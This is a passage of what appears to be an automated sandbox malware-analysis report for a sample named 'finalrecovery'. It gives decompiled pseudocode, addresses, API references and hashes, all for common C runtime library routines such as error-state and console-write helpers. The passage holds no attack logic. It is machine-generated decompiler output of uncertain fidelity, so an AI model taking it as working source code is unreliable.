				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E0041E75F(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E0041E1DB(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E0041E75F(__eflags,  *0x43d1c8, _t51);
							if(__eflags != 0) {
								E0041C911(_t51, 0x4508d8);
								E0041E238(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E0041E75F(__eflags,  *0x43d1c8, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E0041E75F(0,  *0x43d1c8, 0);
							_push(0);
							L9:
							E0041E238();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E0041E720(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x43d1c8; // 0x6
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E00419BC9(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x43d1c8; // 0x6
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E0041E75F(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E0041E1DB(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E0041E75F(__eflags,  *0x43d1c8, _t60);
								if(__eflags != 0) {
									E0041C911(_t60, 0x4508d8);
									E0041E238(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E0041E75F(__eflags,  *0x43d1c8, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E0041E75F(__eflags,  *0x43d1c8, _t20);
								_push(_t60);
								L25:
								E0041E238();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E0041E720(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x43d1c8; // 0x6
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E00419BC9(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x43d1c8; // 0x6
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E0041E75F(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E0041E1DB(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E0041E75F(__eflags,  *0x43d1c8, _t54);
											if(__eflags != 0) {
												E0041C911(_t54, 0x4508d8);
												E0041E238(0);
												goto L45;
											} else {
												_t40 = 0;
												E0041E75F(__eflags,  *0x43d1c8, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E0041E75F(0,  *0x43d1c8, 0);
											_push(0);
											L41:
											E0041E238();
											goto L36;
										}
									}
								} else {
									_t54 = E0041E720(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x43d1c8; // 0x6
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x0041cae3
0x0041cae3
0x0041caee
0x0041caf0
0x0041caf5
0x0041caf8
0x0041cb16
0x0041cb19
0x0041cb1e
0x0041cb20
0x00000000
0x0041cb22
0x0041cb2e
0x0041cb31
0x0041cb32
0x0041cb34
0x0041cb59
0x0041cb5b
0x0041cb74
0x0041cb7b
0x0041cb80
0x00000000
0x0041cb5d
0x0041cb5d
0x0041cb66
0x0041cb6b
0x00000000
0x0041cb6b
0x0041cb36
0x0041cb36
0x0041cb36
0x0041cb3f
0x0041cb44
0x0041cb45
0x0041cb45
0x0041cb4a
0x00000000
0x0041cb4a
0x0041cb34
0x0041cafa
0x0041cb00
0x0041cb04
0x0041cb11
0x00000000
0x0041cb06
0x0041cb09
0x0041cb83
0x0041cb83
0x0041cb0b
0x0041cb0b
0x0041cb0b
0x0041cb0d
0x0041cb0d
0x0041cb0d
0x0041cb09
0x0041cb04
0x0041cb86
0x0041cb8e
0x0041cb90
0x0041cb92
0x0041cb9a
0x0041cb9f
0x0041cba0
0x0041cba5
0x0041cba6
0x0041cba9
0x0041cbc3
0x0041cbc6
0x0041cbcb
0x0041cbcd
0x00000000
0x0041cbcf
0x0041cbdb
0x0041cbde
0x0041cbdf
0x0041cbe1
0x0041cc04
0x0041cc06
0x0041cc1d
0x0041cc24
0x0041cc29
0x00000000
0x0041cc08
0x0041cc0f
0x0041cc14
0x00000000
0x0041cc14
0x0041cbe3
0x0041cbea
0x0041cbef
0x0041cbf0
0x0041cbf0
0x0041cbf5
0x00000000
0x0041cbf5
0x0041cbe1
0x0041cbab
0x0041cbb1
0x0041cbb3
0x0041cbb5
0x0041cbbe
0x00000000
0x0041cbb7
0x0041cbb7
0x0041cbba
0x0041cc34
0x0041cc34
0x0041cc39
0x0041cc3c
0x0041cc3d
0x0041cc3e
0x0041cc45
0x0041cc47
0x0041cc4c
0x0041cc4f
0x0041cc6d
0x0041cc70
0x0041cc75
0x0041cc77
0x00000000
0x0041cc79
0x0041cc85
0x0041cc89
0x0041cc8b
0x0041ccb0
0x0041ccb2
0x0041cccb
0x0041ccd2
0x00000000
0x0041ccb4
0x0041ccb4
0x0041ccbd
0x0041ccc2
0x00000000
0x0041ccc2
0x0041cc8d
0x0041cc8d
0x0041cc8d
0x0041cc96
0x0041cc9b
0x0041cc9c
0x0041cc9c
0x00000000
0x0041cca1
0x0041cc8b
0x0041cc51
0x0041cc57
0x0041cc59
0x0041cc5b
0x0041cc68
0x00000000
0x0041cc5d
0x0041cc5d
0x0041cc60
0x0041ccda
0x0041ccda
0x0041cc62
0x0041cc62
0x0041cc62
0x0041cc62
0x0041cc64
0x0041cc64
0x0041cc64
0x0041cc60
0x0041cc5b
0x0041ccdd
0x0041cce5
0x0041cce7
0x0041cce7
0x0041ccee
0x0041cbbc
0x0041cc2c
0x0041cc2c
0x0041cc2e
0x00000000
0x0041cc30
0x0041cc33
0x0041cc33
0x0041cc2e
0x0041cbba
0x0041cbb5
0x0041cb94
0x0041cb99
0x0041cb99

APIs

GetLastError.KERNEL32(?,?,?,004135E1,?,00000000,00405D9E,?,00418114,?,00000000,74CB6490,?,0041820D,00405D9E,00000000), ref: 0041CAE8
_free.LIBCMT ref: 0041CB45
_free.LIBCMT ref: 0041CB7B
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00418114,?,00000000,74CB6490,?,0041820D,00405D9E,00000000,?,00405D9E,?), ref: 0041CB86

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 9f200c6c461a2cdf4e5aca37af886435c2f74307085e6cb3e1ec61bacee6ffb6
Instruction ID: d9530a12c964a4ca29fce7f7263f5b3a3d50e089d25f9198a1d0a037ee018b8b
Opcode Fuzzy Hash: 9f200c6c461a2cdf4e5aca37af886435c2f74307085e6cb3e1ec61bacee6ffb6
Instruction Fuzzy Hash: D8110A766881002BEB152777BCC7DEB21199BC0778724023BF524C31E2DE6D9CC2462D

Uniqueness

Uniqueness Score: -1.00%

Function 10006E2C Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E10006E2C(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x10017050; // 0x9
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E1000754F(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E10007A37(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E1000754F(__eflags,  *0x10017050, _t51);
							if(__eflags != 0) {
								E10006C2E(_t51, 0x10018340);
								E100079CC(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E1000754F(__eflags,  *0x10017050, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E1000754F(0,  *0x10017050, 0);
							_push(0);
							L9:
							E100079CC();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E10007510(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x10017050; // 0x9
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E100068B8(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x10017050; // 0x9
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E1000754F(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E10007A37(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E1000754F(__eflags,  *0x10017050, _t60);
								if(__eflags != 0) {
									E10006C2E(_t60, 0x10018340);
									E100079CC(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E1000754F(__eflags,  *0x10017050, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E1000754F(__eflags,  *0x10017050, _t20);
								_push(_t60);
								L25:
								E100079CC();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E10007510(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x10017050; // 0x9
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E100068B8(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x10017050; // 0x9
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E1000754F(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E10007A37(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E1000754F(__eflags,  *0x10017050, _t54);
											if(__eflags != 0) {
												E10006C2E(_t54, 0x10018340);
												E100079CC(0);
												goto L45;
											} else {
												_t40 = 0;
												E1000754F(__eflags,  *0x10017050, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E1000754F(0,  *0x10017050, 0);
											_push(0);
											L41:
											E100079CC();
											goto L36;
										}
									}
								} else {
									_t54 = E10007510(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x10017050; // 0x9
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x10006e2c
0x10006e2c
0x10006e37
0x10006e39
0x10006e3e
0x10006e41
0x10006e5f
0x10006e62
0x10006e67
0x10006e69
0x00000000
0x10006e6b
0x10006e77
0x10006e7a
0x10006e7b
0x10006e7d
0x10006ea2
0x10006ea4
0x10006ebd
0x10006ec4
0x10006ec9
0x00000000
0x10006ea6
0x10006ea6
0x10006eaf
0x10006eb4
0x00000000
0x10006eb4
0x10006e7f
0x10006e7f
0x10006e7f
0x10006e88
0x10006e8d
0x10006e8e
0x10006e8e
0x10006e93
0x00000000
0x10006e93
0x10006e7d
0x10006e43
0x10006e49
0x10006e4d
0x10006e5a
0x00000000
0x10006e4f
0x10006e52
0x10006ecc
0x10006ecc
0x10006e54
0x10006e54
0x10006e54
0x10006e56
0x10006e56
0x10006e56
0x10006e52
0x10006e4d
0x10006ecf
0x10006ed7
0x10006ed9
0x10006edb
0x10006ee3
0x10006ee8
0x10006ee9
0x10006eee
0x10006eef
0x10006ef2
0x10006f0c
0x10006f0f
0x10006f14
0x10006f16
0x00000000
0x10006f18
0x10006f24
0x10006f27
0x10006f28
0x10006f2a
0x10006f4d
0x10006f4f
0x10006f66
0x10006f6d
0x10006f72
0x00000000
0x10006f51
0x10006f58
0x10006f5d
0x00000000
0x10006f5d
0x10006f2c
0x10006f33
0x10006f38
0x10006f39
0x10006f39
0x10006f3e
0x00000000
0x10006f3e
0x10006f2a
0x10006ef4
0x10006efa
0x10006efc
0x10006efe
0x10006f07
0x00000000
0x10006f00
0x10006f00
0x10006f03
0x10006f7d
0x10006f7d
0x10006f82
0x10006f85
0x10006f86
0x10006f87
0x10006f8e
0x10006f90
0x10006f95
0x10006f98
0x10006fb6
0x10006fb9
0x10006fbe
0x10006fc0
0x00000000
0x10006fc2
0x10006fce
0x10006fd2
0x10006fd4
0x10006ff9
0x10006ffb
0x10007014
0x1000701b
0x00000000
0x10006ffd
0x10006ffd
0x10007006
0x1000700b
0x00000000
0x1000700b
0x10006fd6
0x10006fd6
0x10006fd6
0x10006fdf
0x10006fe4
0x10006fe5
0x10006fe5
0x00000000
0x10006fea
0x10006fd4
0x10006f9a
0x10006fa0
0x10006fa2
0x10006fa4
0x10006fb1
0x00000000
0x10006fa6
0x10006fa6
0x10006fa9
0x10007023
0x10007023
0x10006fab
0x10006fab
0x10006fab
0x10006fab
0x10006fad
0x10006fad
0x10006fad
0x10006fa9
0x10006fa4
0x10007026
0x1000702e
0x10007030
0x10007030
0x10007037
0x10006f05
0x10006f75
0x10006f75
0x10006f77
0x00000000
0x10006f79
0x10006f7c
0x10006f7c
0x10006f77
0x10006f03
0x10006efe
0x10006edd
0x10006ee2
0x10006ee2

APIs

GetLastError.KERNEL32(?,?,00000000,1000596F,?,10001F08,00000000), ref: 10006E31
_free.LIBCMT ref: 10006E8E
_free.LIBCMT ref: 10006EC4
SetLastError.KERNEL32(00000000,00000009,000000FF,?,?,00000000,1000596F,?,10001F08,00000000), ref: 10006ECF

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: ea4f2d87117ff59a2be36ccf2e5a01138648006dcc0a70dc7a975fe548c38cac
Instruction ID: 37f432e8f1c3d4540bc3d155630daf76477036d6b2592ad693c1ee1dffc85185
Opcode Fuzzy Hash: ea4f2d87117ff59a2be36ccf2e5a01138648006dcc0a70dc7a975fe548c38cac
Instruction Fuzzy Hash: A611A33A600791AAF612D778CC81E5F269BFBC96F97350224F52C821EDDE75DC054620

Uniqueness

Uniqueness Score: -1.00%

Function 0041CC3A Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0041CC3A(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x43d1c8; // 0x6
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E0041E75F(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E0041E1DB(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E0041E75F(__eflags,  *0x43d1c8, _t18);
							if(__eflags != 0) {
								E0041C911(_t18, 0x4508d8);
								E0041E238(0);
								goto L13;
							} else {
								_t13 = 0;
								E0041E75F(__eflags,  *0x43d1c8, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E0041E75F(0,  *0x43d1c8, 0);
							_push(0);
							L9:
							E0041E238();
							goto L4;
						}
					}
				} else {
					_t18 = E0041E720(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x43d1c8; // 0x6
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x0041cc45
0x0041cc47
0x0041cc4c
0x0041cc4f
0x0041cc6d
0x0041cc70
0x0041cc75
0x0041cc77
0x00000000
0x0041cc79
0x0041cc85
0x0041cc89
0x0041cc8b
0x0041ccb0
0x0041ccb2
0x0041cccb
0x0041ccd2
0x00000000
0x0041ccb4
0x0041ccb4
0x0041ccbd
0x0041ccc2
0x00000000
0x0041ccc2
0x0041cc8d
0x0041cc8d
0x0041cc8d
0x0041cc96
0x0041cc9b
0x0041cc9c
0x0041cc9c
0x00000000
0x0041cca1
0x0041cc8b
0x0041cc51
0x0041cc57
0x0041cc5b
0x0041cc68
0x00000000
0x0041cc5d
0x0041cc60
0x0041ccda
0x0041ccda
0x0041cc62
0x0041cc62
0x0041cc62
0x0041cc64
0x0041cc64
0x0041cc64
0x0041cc60
0x0041cc5b
0x0041ccdd
0x0041cce5
0x0041ccee

APIs

GetLastError.KERNEL32(?,?,?,00413576,0041ECF2,?,?,0040FF1B,?,?,?,?,?,00403757,?,?), ref: 0041CC3F
_free.LIBCMT ref: 0041CC9C
_free.LIBCMT ref: 0041CCD2
SetLastError.KERNEL32(00000000,00000006,000000FF,?,0040FF1B,?,?,?,?,?,00403757,?,?,?), ref: 0041CCDD

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 6ed6c1fffe376668d6ec463430be86ae55d08c78e3d74b309a02a079a6731be9
Instruction ID: 80ee3ef2732eae6bbbdeb317a1c4cb0d19d08880bddb464d984e7f18592ca91e
Opcode Fuzzy Hash: 6ed6c1fffe376668d6ec463430be86ae55d08c78e3d74b309a02a079a6731be9
Instruction Fuzzy Hash: B811E9762842002ADB152677ADC5DA7225A9BC0778724023BF92C932E2EE698CC2566D

Uniqueness

Uniqueness Score: -1.00%

Function 10006F83 Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E10006F83(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x10017050; // 0x9
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E1000754F(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E10007A37(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E1000754F(__eflags,  *0x10017050, _t18);
							if(__eflags != 0) {
								E10006C2E(_t18, 0x10018340);
								E100079CC(0);
								goto L13;
							} else {
								_t13 = 0;
								E1000754F(__eflags,  *0x10017050, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E1000754F(0,  *0x10017050, 0);
							_push(0);
							L9:
							E100079CC();
							goto L4;
						}
					}
				} else {
					_t18 = E10007510(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x10017050; // 0x9
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x10006f8e
0x10006f90
0x10006f95
0x10006f98
0x10006fb6
0x10006fb9
0x10006fbe
0x10006fc0
0x00000000
0x10006fc2
0x10006fce
0x10006fd2
0x10006fd4
0x10006ff9
0x10006ffb
0x10007014
0x1000701b
0x00000000
0x10006ffd
0x10006ffd
0x10007006
0x1000700b
0x00000000
0x1000700b
0x10006fd6
0x10006fd6
0x10006fd6
0x10006fdf
0x10006fe4
0x10006fe5
0x10006fe5
0x00000000
0x10006fea
0x10006fd4
0x10006f9a
0x10006fa0
0x10006fa4
0x10006fb1
0x00000000
0x10006fa6
0x10006fa9
0x10007023
0x10007023
0x10006fab
0x10006fab
0x10006fab
0x10006fad
0x10006fad
0x10006fad
0x10006fa9
0x10006fa4
0x10007026
0x1000702e
0x10007037

APIs

GetLastError.KERNEL32(?,?,?,100058BB,100079F2,?,?,10006680), ref: 10006F88
_free.LIBCMT ref: 10006FE5
_free.LIBCMT ref: 1000701B
SetLastError.KERNEL32(00000000,00000009,000000FF,?,?,100058BB,100079F2,?,?,10006680), ref: 10007026

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: e873d5b17466ed3cf03b25e5c499cc37b71d907794f49542c6a6f2519374218d
Instruction ID: eab0be55931113b92519ce8a2baaf2f7ce3ddd718b61ac15db367030395268ba
Opcode Fuzzy Hash: e873d5b17466ed3cf03b25e5c499cc37b71d907794f49542c6a6f2519374218d
Instruction Fuzzy Hash: 0A112F36B04612AAF602D7789CC5E6F265AFBC95F57350234F52C931E9DE75DC014120

Uniqueness

Uniqueness Score: -1.00%

Function 0043F031 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043F04D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043F066

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: bbd0fb90c6f543932e03e6b2f5c9411f0a441a56121ea3fd60b0444541a7708f
Instruction ID: 2f914ca0b150f54681f4df5d10c51623e56e86357141abab0502ee71ee4cbc58
Opcode Fuzzy Hash: bbd0fb90c6f543932e03e6b2f5c9411f0a441a56121ea3fd60b0444541a7708f
Instruction Fuzzy Hash: 80012D33D083119DA62967BDBC855AB2B65DB1C378F20133FF620902F2EF594C19914C

Uniqueness

Uniqueness Score: -1.00%

Function 0042B772 Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0042B772(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x43da90, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E0042B75B();
					E0042B71D();
					_t13 = WriteConsoleW( *0x43da90, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x0042b78f
0x0042b793
0x0042b7a0
0x0042b7a5
0x0042b7c0
0x0042b7c0
0x0042b7c6

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,00000000,?,0042A476,00000000,00000001,00000000,00000000,?,00420B12,?,00000000,00000000), ref: 0042B789
GetLastError.KERNEL32(?,0042A476,00000000,00000001,00000000,00000000,?,00420B12,?,00000000,00000000,?,00000000,?,0042105E,?), ref: 0042B795

Part of subcall function 0042B75B: CloseHandle.KERNEL32(FFFFFFFE,0042B7A5,?,0042A476,00000000,00000001,00000000,00000000,?,00420B12,?,00000000,00000000,?,00000000), ref: 0042B76B

___initconout.LIBCMT ref: 0042B7A5

Part of subcall function 0042B71D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0042B74C,0042A463,00000000,?,00420B12,?,00000000,00000000,?), ref: 0042B730

WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,?,0042A476,00000000,00000001,00000000,00000000,?,00420B12,?,00000000,00000000,?), ref: 0042B7BA

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 3771de78c200026101a5c29d47a2f31da0f5e9a11cf076d30a3b181c11986b3a
Instruction ID: 9d8e1022ac940f47ec700f85471ba7017c9ab44ced289d62b3bb974cafd52c40
Opcode Fuzzy Hash: 3771de78c200026101a5c29d47a2f31da0f5e9a11cf076d30a3b181c11986b3a
Instruction Fuzzy Hash: E3F03736600129BBCF222FD2EC05D9A3F26FF847A0F444035F90996231C7328830ABD8

Uniqueness

Uniqueness Score: -1.00%

Function 1000CCB2 Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000CCB2(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x10017850, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E1000CC9B();
					E1000CC5D();
					_t13 = WriteConsoleW( *0x10017850, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x1000cccf
0x1000ccd3
0x1000cce0
0x1000cce5
0x1000cd00
0x1000cd00
0x1000cd06

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C778,?,00000001,?,00000001,?,1000BA3F,?,?,00000001), ref: 1000CCC9
GetLastError.KERNEL32(?,1000C778,?,00000001,?,00000001,?,1000BA3F,?,?,00000001,?,00000001,?,1000BF8B,100099AA), ref: 1000CCD5

Part of subcall function 1000CC9B: CloseHandle.KERNEL32(FFFFFFFE,1000CCE5,?,1000C778,?,00000001,?,00000001,?,1000BA3F,?,?,00000001,?,00000001), ref: 1000CCAB

___initconout.LIBCMT ref: 1000CCE5

Part of subcall function 1000CC5D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CC8C,1000C765,00000001,?,1000BA3F,?,?,00000001,?), ref: 1000CC70

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C778,?,00000001,?,00000001,?,1000BA3F,?,?,00000001,?), ref: 1000CCFA

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

